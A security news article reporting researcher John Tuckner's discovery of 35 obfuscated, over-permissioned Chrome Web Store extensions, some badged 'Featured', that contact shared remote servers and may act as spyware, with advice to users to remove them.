Do Son 
A recent investigation conducted by independent researcher John Tuckner has revealed that dozens of extensions exhibiting suspicious behavior are currently listed on the Chrome Web Store, with installations exceeding four million devices. Many of these extensions remain hidden from standard search results, while some have even been labeled “Recommended.” Yet behind their seemingly legitimate façades lies a powerful suite of capabilities designed to surveil users and potentially interfere with browser operations.
In total, 35 extensions were identified, all of which share notable commonalities—reused code fragments, calls to identical remote servers, and permission requests granting access to sensitive browser functions. These include access to cookies, control over browser tabs, interception of web requests, JavaScript injection across all visited pages, and configuration storage within the browser itself. Additionally, they employ internal event mechanisms to simulate scheduled activity, such as the routine transmission of “heartbeat” signals to remote servers.
This constellation of permissions effectively grants these extensions near-total control over user activity within the browser, even when their declared purposes do not warrant such privileges. For instance, an extension titled Browse Securely, ostensibly meant to block malicious websites, also requests cookie access—an overreach by any reasonable standard.
Most of the flagged extensions feature heavily obfuscated code, severely hindering any meaningful behavioral analysis. In one case, involving Fire Shield Extension Protection, it was discovered that the extension connects to an external server and dynamically alters its behavior—beginning, for example, to track websites visited, browsing history, and even screen resolution after the installation of another questionable extension.
Some of these add-ons are concealed from public listings and are accessible only via direct links. Yet, curiously, each has garnered an average of 114,000 installations. More puzzling still is that ten of them bear Google’s “Featured” badge—a designation typically reserved for extensions demonstrating high design standards, robust functionality, and verified developer identity. This casts significant doubt on Google’s vetting process and the criteria by which extensions are granted user trust.
Among the most dubious domains associated with these extensions is unknow[.]com, which appears in nearly all of them. Despite active monitoring, it remains difficult to ascertain exactly what data the extensions collect or transmit. Their behavior—remote server connections, dynamic functionality toggling, and sophisticated obfuscation—strongly suggests components of spyware or infostealers.
Tuckner emphasizes that while no explicit credential theft was observed during testing, the architecture and potential capabilities of these extensions constitute a serious threat. Any extension capable of receiving remote commands and altering its behavior based on server-side configurations must be considered a potential surveillance tool.
As of now, Google has not commented on the findings or confirmed whether an investigation is underway. Attempts to reach the developers through the contact information listed in the privacy policies have gone unanswered. The full list of implicated extensions, along with their identifiers and indicators of compromise (IOCs), has been published in Tuckner’s report and its accompanying documentation.
The list includes names such as Fire Shield Chrome Safety, Protecto for Chrome, Securify Your Browser, Check My Permissions, among others. Users are strongly advised to remove these extensions immediately and audit all other add-ons installed in their browsers.
